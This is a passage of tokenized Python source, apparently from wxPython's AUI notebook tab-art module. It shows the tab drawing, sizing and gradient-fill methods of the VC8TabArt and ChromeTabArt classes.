GetAGWFlags ( ) <EOL> tabPoints [ <NUM_LIT:0> ] . x = tab_x + <NUM_LIT:3> <EOL> tabPoints [ <NUM_LIT:0> ] . y = ( agwFlags & AUI_NB_BOTTOM and [ <NUM_LIT:3> ] or [ tab_height - <NUM_LIT:2> ] ) [ <NUM_LIT:0> ] <EOL> tabPoints [ <NUM_LIT:1> ] . x = tabPoints [ <NUM_LIT:0> ] . x <EOL> tabPoints [ <NUM_LIT:1> ] . y = ( agwFlags & AUI_NB_BOTTOM and [ tab_height - ( vertical_border_padding + <NUM_LIT:2> ) - adjust ] or [ ( vertical_border_padding + <NUM_LIT:2> ) + adjust ] ) [ <NUM_LIT:0> ] <EOL> tabPoints [ <NUM_LIT:2> ] . x = tabPoints [ <NUM_LIT:1> ] . x + <NUM_LIT:2> <EOL> tabPoints [ <NUM_LIT:2> ] . y = ( agwFlags & AUI_NB_BOTTOM and [ tab_height - vertical_border_padding - adjust ] or [ vertical_border_padding + adjust ] ) [ <NUM_LIT:0> ] <EOL> tabPoints [ <NUM_LIT:3> ] . x = tab_x + tab_width - <NUM_LIT:2> <EOL> tabPoints [ <NUM_LIT:3> ] . y = tabPoints [ <NUM_LIT:2> ] . y <EOL> tabPoints [ <NUM_LIT:4> ] . x = tabPoints [ <NUM_LIT:3> ] . x + <NUM_LIT:2> <EOL> tabPoints [ <NUM_LIT:4> ] . y = tabPoints [ <NUM_LIT:1> ] . y <EOL> tabPoints [ <NUM_LIT:5> ] . x = tabPoints [ <NUM_LIT:4> ] . x <EOL> tabPoints [ <NUM_LIT:5> ] . y = tabPoints [ <NUM_LIT:0> ] . y <EOL> tabPoints [ <NUM_LIT:6> ] . x = tabPoints [ <NUM_LIT:0> ] . x <EOL> tabPoints [ <NUM_LIT:6> ] . y = tabPoints [ <NUM_LIT:0> ] . y <EOL> rr = wx . RectPP ( tabPoints [ <NUM_LIT:2> ] , tabPoints [ <NUM_LIT:5> ] ) <EOL> self . DrawTabBackground ( dc , rr , page . active , ( agwFlags & AUI_NB_BOTTOM ) == <NUM_LIT:0> ) <EOL> dc . SetBrush ( wx . TRANSPARENT_BRUSH ) <EOL> dc . SetPen ( wx . Pen ( wx . SystemSettings_GetColour ( wx . SYS_COLOUR_BTNSHADOW ) ) ) <EOL> dc . DrawPolygon ( tabPoints ) <EOL> if page . active : <EOL> dc . DrawLine ( tabPoints [ <NUM_LIT:0> ] . x + <NUM_LIT:1> , tabPoints [ <NUM_LIT:0> ] . y , tabPoints [ <NUM_LIT:5> ] . x , tabPoints [ <NUM_LIT:0> ] . y ) <EOL> drawn_tab_yoff = tabPoints [ <NUM_LIT:1> ] . y <EOL> drawn_tab_height = tabPoints [ <NUM_LIT:0> ] . y - tabPoints [ <NUM_LIT:2> ] . y <EOL> text_offset = tab_x + <NUM_LIT:8> <EOL> close_button_width = <NUM_LIT:0> <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> close_button_width = self . _active_close_bmp . GetWidth ( ) <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> text_offset += close_button_width - <NUM_LIT:4> <EOL> if not page . enabled : <EOL> dc . SetTextForeground ( wx . SystemSettings . GetColour ( wx . SYS_COLOUR_GRAYTEXT ) ) <EOL> pagebitmap = page . dis_bitmap <EOL> else : <EOL> dc . SetTextForeground ( page . text_colour ) <EOL> pagebitmap = page . bitmap <EOL> shift = - <NUM_LIT:1> <EOL> if agwFlags & AUI_NB_BOTTOM : <EOL> shift = <NUM_LIT:2> <EOL> bitmap_offset = <NUM_LIT:0> <EOL> if pagebitmap . IsOk ( ) : <EOL> bitmap_offset = tab_x + <NUM_LIT:8> <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT and close_button_width : <EOL> bitmap_offset += close_button_width - <NUM_LIT:4> <EOL> dc . DrawBitmap ( pagebitmap , bitmap_offset , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( pagebitmap . GetHeight ( ) / <NUM_LIT:2> ) + shift , <EOL> True ) <EOL> text_offset = bitmap_offset + pagebitmap . GetWidth ( ) <EOL> text_offset += <NUM_LIT:3> <EOL> else : <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT == <NUM_LIT:0> or not close_button_width : <EOL> text_offset = tab_x + <NUM_LIT:8> <EOL> caption = page . caption <EOL> if caption == "<STR_LIT>" : <EOL> caption = "<STR_LIT>" <EOL> if page . active : <EOL> dc . SetFont ( self . _selected_font ) <EOL> textx , texty , dummy = dc . GetMultiLineTextExtent ( caption ) <EOL> else : <EOL> dc . SetFont ( self . _normal_font ) <EOL> textx , texty , dummy = dc . GetMultiLineTextExtent ( caption ) <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> draw_text = ChopText ( dc , caption , tab_width - ( text_offset - tab_x ) - close_button_width + <NUM_LIT:1> ) <EOL> else : <EOL> draw_text = ChopText ( dc , caption , tab_width - ( text_offset - tab_x ) - close_button_width ) <EOL> ypos = drawn_tab_yoff + drawn_tab_height / <NUM_LIT:2> - texty / <NUM_LIT:2> - <NUM_LIT:1> + shift <EOL> offset_focus = text_offset <EOL> if control is not None : <EOL> if control . GetPosition ( ) != wx . Point ( text_offset + <NUM_LIT:1> , ypos ) : <EOL> control . SetPosition ( wx . Point ( text_offset + <NUM_LIT:1> , ypos ) ) <EOL> if not control . IsShown ( ) : <EOL> control . Show ( ) <EOL> if paint_control : <EOL> bmp = TakeScreenShot ( control . GetScreenRect ( ) ) <EOL> dc . DrawBitmap ( bmp , text_offset + <NUM_LIT:1> , ypos , True ) <EOL> controlW , controlH = control . GetSize ( ) <EOL> text_offset += controlW + <NUM_LIT:4> <EOL> textx += controlW + <NUM_LIT:4> <EOL> rectx , recty , dummy = dc . GetMultiLineTextExtent ( draw_text ) <EOL> dc . DrawLabel ( draw_text , wx . Rect ( text_offset , ypos , rectx , recty ) ) <EOL> if ( agwFlags & AUI_NB_NO_TAB_FOCUS ) == <NUM_LIT:0> : <EOL> self . DrawFocusRectangle ( dc , page , wnd , draw_text , offset_focus , bitmap_offset , drawn_tab_yoff + shift , <EOL> drawn_tab_height , rectx , recty ) <EOL> out_button_rect = wx . Rect ( ) <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> close_button_width = self . _active_close_bmp . GetWidth ( ) <EOL> bmp = self . _disabled_close_bmp <EOL> if close_button_state == AUI_BUTTON_STATE_HOVER : <EOL> bmp = self . _hover_close_bmp <EOL> elif close_button_state == AUI_BUTTON_STATE_PRESSED : <EOL> bmp = self . _pressed_close_bmp <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> rect = wx . Rect ( tab_x + <NUM_LIT:5> , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) + shift , <EOL> close_button_width , tab_height ) <EOL> else : <EOL> rect = wx . Rect ( tab_x + tab_width - close_button_width - <NUM_LIT:3> , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) + shift , <EOL> close_button_width , tab_height ) <EOL> rect = IndentPressedBitmap ( rect , close_button_state ) <EOL> dc . DrawBitmap ( bmp , rect . x , rect . y , True ) <EOL> out_button_rect = rect <EOL> out_tab_rect = wx . Rect ( tab_x , tab_y , tab_width , tab_height ) <EOL> dc . DestroyClippingRegion ( ) <EOL> return out_tab_rect , out_button_rect , x_extent <EOL> def DrawTabBackground ( self , dc , rect , focus , upperTabs ) : <EOL> """<STR_LIT>""" <EOL> regPts = [ wx . Point ( ) for indx in xrange ( <NUM_LIT:9> ) ] <EOL> if focus : <EOL> if upperTabs : <EOL> leftPt = wx . Point ( rect . x , rect . y + ( rect . height / <NUM_LIT:10> ) * <NUM_LIT:8> ) <EOL> rightPt = wx . Point ( rect . x + rect . width - <NUM_LIT:2> , rect . y + ( rect . height / <NUM_LIT:10> ) * <NUM_LIT:8> ) <EOL> else : <EOL> leftPt = wx . Point ( rect . x , rect . y + ( rect . height / <NUM_LIT:10> ) * <NUM_LIT:5> ) <EOL> rightPt = wx . Point ( rect . x + rect . width - <NUM_LIT:2> , rect . y + ( rect . height / <NUM_LIT:10> ) * <NUM_LIT:5> ) <EOL> else : <EOL> leftPt = wx . Point ( rect . x , rect . y + ( rect . height / <NUM_LIT:2> ) ) <EOL> rightPt = wx . Point ( rect . x + rect . width - <NUM_LIT:2> , rect . y + ( rect . height / <NUM_LIT:2> ) ) <EOL> top = wx . RectPP ( rect . GetTopLeft ( ) , rightPt ) <EOL> bottom = wx . RectPP ( leftPt , rect . GetBottomRight ( ) ) <EOL> topStartColour = wx . WHITE <EOL> if not focus : <EOL> topStartColour = LightColour ( wx . SystemSettings_GetColour ( wx . SYS_COLOUR_3DFACE ) , <NUM_LIT:50> ) <EOL> topEndColour = wx . SystemSettings_GetColour ( wx . SYS_COLOUR_3DFACE ) <EOL> bottomStartColour = topEndColour <EOL> bottomEndColour = topEndColour <EOL> if upperTabs : <EOL> if focus : <EOL> dc . GradientFillLinear ( top , topStartColour , topEndColour , wx . SOUTH ) <EOL> dc . GradientFillLinear ( bottom , bottomStartColour , bottomEndColour , wx . SOUTH ) <EOL> else : <EOL> dc . GradientFillLinear ( top , topEndColour , topStartColour , wx . SOUTH ) <EOL> dc . GradientFillLinear ( bottom , bottomStartColour , bottomEndColour , wx . SOUTH ) <EOL> else : <EOL> if focus : <EOL> dc . GradientFillLinear ( bottom , topEndColour , bottomEndColour , wx . SOUTH ) <EOL> dc . GradientFillLinear ( top , topStartColour , topStartColour , wx . SOUTH ) <EOL> else : <EOL> dc . GradientFillLinear ( bottom , bottomStartColour , bottomEndColour , wx . SOUTH ) <EOL> dc . GradientFillLinear ( top , topEndColour , topStartColour , wx . SOUTH ) <EOL> dc . SetBrush ( wx . TRANSPARENT_BRUSH ) <EOL> class VC8TabArt ( AuiDefaultTabArt ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> AuiDefaultTabArt . __init__ ( self ) <EOL> def Clone ( self ) : <EOL> """<STR_LIT>""" <EOL> art = type ( self ) ( ) <EOL> art . SetNormalFont ( self . GetNormalFont ( ) ) <EOL> art . SetSelectedFont ( self . GetSelectedFont ( ) ) <EOL> art . SetMeasuringFont ( self . GetMeasuringFont ( ) ) <EOL> art = CopyAttributes ( art , self ) <EOL> return art <EOL> def SetSizingInfo ( self , tab_ctrl_size , tab_count , minMaxTabWidth ) : <EOL> """<STR_LIT>""" <EOL> AuiDefaultTabArt . SetSizingInfo ( self , tab_ctrl_size , tab_count , minMaxTabWidth ) <EOL> minTabWidth , maxTabWidth = minMaxTabWidth <EOL> if minTabWidth > - <NUM_LIT:1> : <EOL> self . _fixed_tab_width = max ( self . _fixed_tab_width , minTabWidth ) <EOL> if maxTabWidth > - <NUM_LIT:1> : <EOL> self . _fixed_tab_width = min ( self . _fixed_tab_width , maxTabWidth ) <EOL> self . _fixed_tab_width -= <NUM_LIT:5> <EOL> def GetTabSize ( self , dc , wnd , caption , bitmap , active , close_button_state , control = None ) : <EOL> """<STR_LIT>""" <EOL> tab_size , x_extent = AuiDefaultTabArt . GetTabSize ( self , dc , wnd , caption , bitmap , <EOL> active , close_button_state , control ) <EOL> tab_width , tab_height = tab_size <EOL> tab_width += <NUM_LIT:10> <EOL> if not bitmap . IsOk ( ) : <EOL> tab_width += <NUM_LIT:5> <EOL> tab_height += <NUM_LIT:2> <EOL> return ( tab_width , tab_height ) , x_extent <EOL> def DrawTab ( self , dc , wnd , page , in_rect , close_button_state , paint_control = False ) : <EOL> """<STR_LIT>""" <EOL> control = page . control <EOL> tab_size , x_extent = self . GetTabSize ( dc , wnd , page . caption , page . bitmap , <EOL> page . active , close_button_state , control ) <EOL> tab_height = self . _tab_ctrl_height - <NUM_LIT:1> <EOL> tab_width = tab_size [ <NUM_LIT:0> ] <EOL> tab_x = in_rect . x <EOL> tab_y = in_rect . y + in_rect . height - tab_height <EOL> clip_width = tab_width + <NUM_LIT:3> <EOL> if tab_x + clip_width > in_rect . x + in_rect . width - <NUM_LIT:4> : <EOL> clip_width = ( in_rect . x + in_rect . width ) - tab_x - <NUM_LIT:4> <EOL> tabPoints = [ wx . Point ( ) for i in xrange ( <NUM_LIT:8> ) ] <EOL> adjust = <NUM_LIT:0> <EOL> if not page . active : <EOL> adjust = <NUM_LIT:1> <EOL> agwFlags = self . GetAGWFlags ( ) <EOL> tabPoints [ <NUM_LIT:0> ] . x = ( agwFlags & AUI_NB_BOTTOM and [ tab_x ] or [ tab_x + adjust ] ) [ <NUM_LIT:0> ] <EOL> tabPoints [ <NUM_LIT:0> ] . y = ( agwFlags & AUI_NB_BOTTOM and [ <NUM_LIT:2> ] or [ tab_height - <NUM_LIT:3> ] ) [ <NUM_LIT:0> ] <EOL> tabPoints [ <NUM_LIT:1> ] . x = tabPoints [ <NUM_LIT:0> ] . x + tab_height - vertical_border_padding - <NUM_LIT:3> - adjust <EOL> tabPoints [ <NUM_LIT:1> ] . y = ( agwFlags & AUI_NB_BOTTOM and [ tab_height - ( vertical_border_padding + <NUM_LIT:2> ) ] or [ ( vertical_border_padding + <NUM_LIT:2> ) ] ) [ <NUM_LIT:0> ] <EOL> tabPoints [ <NUM_LIT:2> ] . x = tabPoints [ <NUM_LIT:1> ] . x + <NUM_LIT:4> <EOL> tabPoints [ <NUM_LIT:2> ] . y = ( agwFlags & AUI_NB_BOTTOM and [ tab_height - vertical_border_padding ] or [ vertical_border_padding ] ) [ <NUM_LIT:0> ] <EOL> tabPoints [ <NUM_LIT:3> ] . x = tabPoints [ <NUM_LIT:2> ] . x + tab_width - tab_height + vertical_border_padding <EOL> tabPoints [ <NUM_LIT:3> ] . y = ( agwFlags & AUI_NB_BOTTOM and [ tab_height - vertical_border_padding ] or [ vertical_border_padding ] ) [ <NUM_LIT:0> ] <EOL> tabPoints [ <NUM_LIT:4> ] . x = tabPoints [ <NUM_LIT:3> ] . x + <NUM_LIT:1> <EOL> tabPoints [ <NUM_LIT:4> ] . y = ( agwFlags & AUI_NB_BOTTOM and [ tabPoints [ <NUM_LIT:3> ] . y - <NUM_LIT:1> ] or [ tabPoints [ <NUM_LIT:3> ] . y + <NUM_LIT:1> ] ) [ <NUM_LIT:0> ] <EOL> tabPoints [ <NUM_LIT:5> ] . x = tabPoints [ <NUM_LIT:4> ] . x + <NUM_LIT:1> <EOL> tabPoints [ <NUM_LIT:5> ] . y = ( agwFlags & AUI_NB_BOTTOM and [ ( tabPoints [ <NUM_LIT:4> ] . y - <NUM_LIT:1> ) ] or [ tabPoints [ <NUM_LIT:4> ] . y + <NUM_LIT:1> ] ) [ <NUM_LIT:0> ] <EOL> tabPoints [ <NUM_LIT:6> ] . x = tabPoints [ <NUM_LIT:2> ] . x + tab_width - tab_height + <NUM_LIT:2> + vertical_border_padding <EOL> tabPoints [ <NUM_LIT:6> ] . y = tabPoints [ <NUM_LIT:0> ] . y <EOL> tabPoints [ <NUM_LIT:7> ] . x = tabPoints [ <NUM_LIT:0> ] . x <EOL> tabPoints [ <NUM_LIT:7> ] . y = tabPoints [ <NUM_LIT:0> ] . y <EOL> self . FillVC8GradientColour ( dc , tabPoints , page . active ) <EOL> dc . SetBrush ( wx . TRANSPARENT_BRUSH ) <EOL> dc . SetPen ( wx . Pen ( wx . SystemSettings . GetColour ( wx . SYS_COLOUR_BTNSHADOW ) ) ) <EOL> dc . DrawPolygon ( tabPoints ) <EOL> if page . active : <EOL> dc . SetPen ( wx . WHITE_PEN ) <EOL> dc . DrawLine ( tabPoints [ <NUM_LIT:0> ] . x , tabPoints [ <NUM_LIT:0> ] . y , tabPoints [ <NUM_LIT:6> ] . x , tabPoints [ <NUM_LIT:6> ] . y ) <EOL> dc . SetClippingRegion ( tab_x , tab_y , clip_width + <NUM_LIT:2> , tab_height - <NUM_LIT:3> ) <EOL> drawn_tab_yoff = tabPoints [ <NUM_LIT:1> ] . y <EOL> drawn_tab_height = tabPoints [ <NUM_LIT:0> ] . y - tabPoints [ <NUM_LIT:2> ] . y <EOL> text_offset = tab_x + <NUM_LIT:20> <EOL> close_button_width = <NUM_LIT:0> <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> close_button_width = self . _active_close_bmp . GetWidth ( ) <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> text_offset += close_button_width <EOL> if not page . enabled : <EOL> dc . SetTextForeground ( wx . SystemSettings . GetColour ( wx . SYS_COLOUR_GRAYTEXT ) ) <EOL> pagebitmap = page . dis_bitmap <EOL> else : <EOL> dc . SetTextForeground ( page . text_colour ) <EOL> pagebitmap = page . bitmap <EOL> shift = <NUM_LIT:0> <EOL> if agwFlags & AUI_NB_BOTTOM : <EOL> shift = ( page . active and [ <NUM_LIT:1> ] or [ <NUM_LIT:2> ] ) [ <NUM_LIT:0> ] <EOL> bitmap_offset = <NUM_LIT:0> <EOL> if pagebitmap . IsOk ( ) : <EOL> bitmap_offset = tab_x + <NUM_LIT:20> <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT and close_button_width : <EOL> bitmap_offset += close_button_width <EOL> dc . DrawBitmap ( pagebitmap , bitmap_offset , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( pagebitmap . GetHeight ( ) / <NUM_LIT:2> ) + shift , <EOL> True ) <EOL> text_offset = bitmap_offset + pagebitmap . GetWidth ( ) <EOL> text_offset += <NUM_LIT:3> <EOL> else : <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT == <NUM_LIT:0> or not close_button_width : <EOL> text_offset = tab_x + tab_height <EOL> caption = page . caption <EOL> if caption == "<STR_LIT>" : <EOL> caption = "<STR_LIT>" <EOL> if page . active : <EOL> dc . SetFont ( self . _selected_font ) <EOL> textx , texty , dummy = dc . GetMultiLineTextExtent ( caption ) <EOL> else : <EOL> dc . SetFont ( self . _normal_font ) <EOL> textx , texty , dummy = dc . GetMultiLineTextExtent ( caption ) <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> draw_text = ChopText ( dc , caption , tab_width - ( text_offset - tab_x ) ) <EOL> else : <EOL> draw_text = ChopText ( dc , caption , tab_width - ( text_offset - tab_x ) - close_button_width ) <EOL> ypos = drawn_tab_yoff + drawn_tab_height / <NUM_LIT:2> - texty / <NUM_LIT:2> - <NUM_LIT:1> + shift <EOL> offset_focus = text_offset <EOL> if control is not None : <EOL> if control . GetPosition ( ) != wx . Point ( text_offset + <NUM_LIT:1> , ypos ) : <EOL> control . SetPosition ( wx . Point ( text_offset + <NUM_LIT:1> , ypos ) ) <EOL> if not control . IsShown ( ) : <EOL> control . Show ( ) <EOL> if paint_control : <EOL> bmp = TakeScreenShot ( control . GetScreenRect ( ) ) <EOL> dc . DrawBitmap ( bmp , text_offset + <NUM_LIT:1> , ypos , True ) <EOL> controlW , controlH = control . GetSize ( ) <EOL> text_offset += controlW + <NUM_LIT:4> <EOL> textx += controlW + <NUM_LIT:4> <EOL> rectx , recty , dummy = dc . GetMultiLineTextExtent ( draw_text ) <EOL> dc . DrawLabel ( draw_text , wx . Rect ( text_offset , ypos , rectx , recty ) ) <EOL> if ( agwFlags & AUI_NB_NO_TAB_FOCUS ) == <NUM_LIT:0> : <EOL> self . DrawFocusRectangle ( dc , page , wnd , draw_text , offset_focus , bitmap_offset , drawn_tab_yoff + shift , <EOL> drawn_tab_height + shift , rectx , recty ) <EOL> out_button_rect = wx . Rect ( ) <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> close_button_width = self . _active_close_bmp . GetWidth ( ) <EOL> bmp = self . _disabled_close_bmp <EOL> if close_button_state == AUI_BUTTON_STATE_HOVER : <EOL> bmp = self . _hover_close_bmp <EOL> elif close_button_state == AUI_BUTTON_STATE_PRESSED : <EOL> bmp = self . _pressed_close_bmp <EOL> if page . active : <EOL> xpos = tab_x + tab_width - close_button_width + <NUM_LIT:3> <EOL> else : <EOL> xpos = tab_x + tab_width - close_button_width - <NUM_LIT:5> <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> rect = wx . Rect ( tab_x + <NUM_LIT:20> , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) + shift , <EOL> close_button_width , tab_height ) <EOL> else : <EOL> rect = wx . Rect ( xpos , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) + shift , <EOL> close_button_width , tab_height ) <EOL> rect = IndentPressedBitmap ( rect , close_button_state ) <EOL> dc . DrawBitmap ( bmp , rect . x , rect . y , True ) <EOL> out_button_rect = rect <EOL> out_tab_rect = wx . Rect ( tab_x , tab_y , x_extent , tab_height ) <EOL> dc . DestroyClippingRegion ( ) <EOL> return out_tab_rect , out_button_rect , x_extent <EOL> def FillVC8GradientColour ( self , dc , tabPoints , active ) : <EOL> """<STR_LIT>""" <EOL> xList = [ pt . x for pt in tabPoints ] <EOL> yList = [ pt . y for pt in tabPoints ] <EOL> minx , maxx = min ( xList ) , max ( xList ) <EOL> miny , maxy = min ( yList ) , max ( yList ) <EOL> rect = wx . Rect ( minx , maxy , maxx - minx , miny - maxy + <NUM_LIT:1> ) <EOL> region = wx . RegionFromPoints ( tabPoints ) <EOL> if self . _buttonRect . width > <NUM_LIT:0> : <EOL> buttonRegion = wx . Region ( * self . _buttonRect ) <EOL> region . XorRegion ( buttonRegion ) <EOL> dc . SetClippingRegionAsRegion ( region ) <EOL> if active : <EOL> bottom_colour = top_colour = wx . WHITE <EOL> else : <EOL> bottom_colour = StepColour ( self . _base_colour , <NUM_LIT> ) <EOL> top_colour = StepColour ( self . _base_colour , <NUM_LIT> ) <EOL> dc . GradientFillLinear ( rect , top_colour , bottom_colour , wx . SOUTH ) <EOL> dc . DestroyClippingRegion ( ) <EOL> class ChromeTabArt ( AuiDefaultTabArt ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> AuiDefaultTabArt . __init__ ( self ) <EOL> self . SetBitmaps ( mirror = False ) <EOL> closeBmp = tab_close . GetBitmap ( ) <EOL> closeHBmp = tab_close_h . GetBitmap ( ) <EOL> closePBmp = tab_close_p . GetBitmap ( ) <EOL> self . SetCustomButton ( AUI_BUTTON_CLOSE , AUI_BUTTON_STATE_NORMAL , closeBmp ) <EOL> self . SetCustomButton ( AUI_BUTTON_CLOSE , AUI_BUTTON_STATE_HOVER , closeHBmp ) <EOL> self . SetCustomButton ( AUI_BUTTON_CLOSE , AUI_BUTTON_STATE_PRESSED , closePBmp ) <EOL> def SetAGWFlags ( self , agwFlags ) : <EOL> """<STR_LIT>""" <EOL> if agwFlags & AUI_NB_TOP : <EOL> self . SetBitmaps ( mirror = False ) <EOL> elif agwFlags & AUI_NB_BOTTOM : <EOL> self . SetBitmaps ( mirror = True ) <EOL> AuiDefaultTabArt . SetAGWFlags ( self , agwFlags ) <EOL> def SetBitmaps ( self , mirror ) : <EOL> """<STR_LIT>""" <EOL> bmps = [ tab_active_left . GetBitmap ( ) , tab_active_center . GetBitmap ( ) , <EOL> tab_active_right . GetBitmap ( ) , tab_inactive_left . GetBitmap ( ) , <EOL> tab_inactive_center . GetBitmap ( ) , tab_inactive_right . GetBitmap ( ) ] <EOL> if mirror : <EOL> for indx , bmp in enumerate ( bmps ) : <EOL> img = bmp . ConvertToImage ( ) <EOL> img = img . Mirror ( horizontally = False ) <EOL> bmps [ indx ] = img . ConvertToBitmap ( ) <EOL> self . _leftActiveBmp = bmps [ <NUM_LIT:0> ] <EOL> self . _centerActiveBmp = bmps [ <NUM_LIT:1> ] <EOL> self . _rightActiveBmp = bmps [ <NUM_LIT:2> ] <EOL> self . _leftInactiveBmp = bmps [ <NUM_LIT:3> ] <EOL> self . _centerInactiveBmp = bmps [ <NUM_LIT:4> ] <EOL> self . _rightInactiveBmp = bmps [ <NUM_LIT:5> ] <EOL> def Clone ( self ) : <EOL> """<STR_LIT>""" <EOL> art = type ( self ) ( ) <EOL> art . SetNormalFont ( self . GetNormalFont ( ) ) <EOL> art . SetSelectedFont ( self . GetSelectedFont ( ) ) <EOL> art . SetMeasuringFont ( self . GetMeasuringFont ( ) ) <EOL> art = CopyAttributes ( art , self ) <EOL> return art <EOL> def SetSizingInfo ( self , tab_ctrl_size , tab_count , minMaxTabWidth ) : <EOL> """<STR_LIT>""" <EOL> AuiDefaultTabArt . SetSizingInfo ( self , tab_ctrl_size , tab_count , minMaxTabWidth ) <EOL> minTabWidth , maxTabWidth = minMaxTabWidth <EOL> if minTabWidth > - <NUM_LIT:1> : <EOL> self . _fixed_tab_width = max ( self . _fixed_tab_width , minTabWidth ) <EOL> if maxTabWidth > - <NUM_LIT:1> : <EOL> self . _fixed_tab_width = min ( self . _fixed_tab_width , maxTabWidth ) <EOL> self . _fixed_tab_width -= <NUM_LIT:5> <EOL> def GetTabSize ( self , dc , wnd , caption , bitmap , active , close_button_state , control = None ) : <EOL> """<STR_LIT>""" <EOL> tab_size , x_extent = AuiDefaultTabArt . GetTabSize ( self , dc , wnd , caption , bitmap , <EOL> active , close_button_state , control ) <EOL> tab_width , tab_height = tab_size <EOL> tab_width += self . _leftActiveBmp . GetWidth ( ) <EOL> tab_height += <NUM_LIT:2> <EOL> tab_height = max ( tab_height , self . _centerActiveBmp . GetHeight ( ) ) <EOL> return ( tab_width , tab_height ) , x_extent <EOL> def DrawTab ( self , dc , wnd , page , in_rect , close_button_state , paint_control = False ) : <EOL> """<STR_LIT>""" <EOL> control = page . control <EOL> tab_size , x_extent = self . GetTabSize ( dc , wnd , page . caption , page . bitmap , page . active , <EOL> close_button_state , control ) <EOL> agwFlags = self . GetAGWFlags ( ) <EOL> tab_height = self . _tab_ctrl_height - <NUM_LIT:1> <EOL> tab_width = tab_size [ <NUM_LIT:0> ] <EOL> tab_x = in_rect . x <EOL> tab_y = in_rect . y + in_rect . height - tab_height <EOL> clip_width = tab_width <EOL> if tab_x + clip_width > in_rect . x + in_rect . width - <NUM_LIT:4> : <EOL> clip_width = ( in_rect . x + in_rect . width ) - tab_x - <NUM_LIT:4> <EOL> dc . SetClippingRegion ( tab_x , tab_y , clip_width + <NUM_LIT:1> , tab_height - <NUM_LIT:3> ) <EOL> drawn_tab_yoff = <NUM_LIT:1> <EOL> if page . active : <EOL> left = self . _leftActiveBmp <EOL> center = self . _centerActiveBmp <EOL> right = self . _rightActiveBmp <EOL> else : <EOL> left = self . _leftInactiveBmp <EOL> center = self . _centerInactiveBmp <EOL> right = self . _rightInactiveBmp <EOL> dc . DrawBitmap ( left , tab_x , tab_y ) <EOL> leftw = left . GetWidth ( ) <EOL> centerw = center . GetWidth ( ) <EOL> rightw = right . GetWidth ( ) <EOL> available = tab_x + tab_width - rightw <EOL> posx = tab_x + leftw <EOL> while <NUM_LIT:1> : <EOL> if posx >= available : <EOL> break <EOL> dc . DrawBitmap ( center , posx , tab_y ) <EOL> posx += centerw <EOL> dc . DrawBitmap ( right , posx , tab_y ) <EOL> drawn_tab_height = center . GetHeight ( ) <EOL> text_offset = tab_x + leftw <EOL> close_button_width = <NUM_LIT:0> <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> close_button_width = self . _active_close_bmp . GetWidth ( ) <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> text_offset += close_button_width <EOL> if not page . enabled : <EOL> dc . SetTextForeground ( wx . SystemSettings . GetColour ( wx . SYS_COLOUR_GRAYTEXT ) ) <EOL> pagebitmap = page . dis_bitmap <EOL> else : <EOL> dc . SetTextForeground ( page . text_colour ) <EOL> pagebitmap = page . bitmap <EOL> bitmap_offset = <NUM_LIT:0> <EOL> if pagebitmap . IsOk ( ) : <EOL> bitmap_offset = tab_x + leftw <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT and close_button_width : <EOL> bitmap_offset += close_button_width <EOL> dc . DrawBitmap ( pagebitmap , bitmap_offset , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( pagebitmap . GetHeight ( ) / <NUM_LIT:2> ) , <EOL> True ) <EOL> text_offset = bitmap_offset + pagebitmap . GetWidth ( ) <EOL> text_offset += <NUM_LIT:3> <EOL> else : <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT == <NUM_LIT:0> or not close_button_width : <EOL> text_offset = tab_x + leftw <EOL> caption = page . caption <EOL> if caption == "<STR_LIT>" : <EOL> caption = "<STR_LIT>" <EOL> if page . active : <EOL> dc . SetFont ( self . _selected_font ) <EOL> textx , texty , dummy = dc . GetMultiLineTextExtent ( caption ) <EOL> else : <EOL> dc . SetFont ( self . _normal_font ) <EOL> textx , texty , dummy = dc . GetMultiLineTextExtent ( caption ) <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> draw_text = ChopText ( dc , caption , tab_width - ( text_offset - tab_x ) - leftw ) <EOL> else : <EOL> draw_text = ChopText ( dc , caption , tab_width - ( text_offset - tab_x ) - close_button_width - leftw ) <EOL> ypos = drawn_tab_yoff + drawn_tab_height / <NUM_LIT:2> - texty / <NUM_LIT:2> - <NUM_LIT:1> <EOL> if control is not None : <EOL> if control . GetPosition ( ) != wx . Point ( text_offset + <NUM_LIT:1> , ypos ) : <EOL> control . SetPosition ( wx . Point ( text_offset + <NUM_LIT:1> , ypos ) ) <EOL> if not control . IsShown ( ) : <EOL> 